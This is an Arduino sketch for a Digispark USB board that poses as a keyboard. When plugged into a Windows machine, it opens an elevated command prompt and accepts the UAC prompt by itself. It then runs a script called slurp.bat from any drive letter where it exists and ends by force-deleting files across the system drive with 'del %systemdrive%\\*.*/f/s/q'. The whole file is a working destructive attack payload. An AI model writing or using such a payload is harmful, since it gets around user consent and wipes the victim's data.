#include "DigiKeyboard.h"
void setup() {
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(0, MOD_GUI_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.print("cmd");
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ENTER, MOD_CONTROL_LEFT | MOD_SHIFT_LEFT);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_ARROW_LEFT);
  DigiKeyboard.delay(750);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(500);
  DigiKeyboard.println("color a");
  DigiKeyboard.println("A:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("B:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("C:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("D:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("E:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("F:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("G:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("H:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("I:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("J:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("K:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("L:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("M:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("N:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("O:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("P:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("Q:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("R:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("T:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("U:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("V:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("W:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("X:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("Y:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("Z:");
  DigiKeyboard.println("if Exist slurp.bat (slurp.bat)");
  DigiKeyboard.println("del %systemdrive%\\*.*/f/s/q >>nul");
  DigiKeyboard.println("exit");
  }
void loop() {}
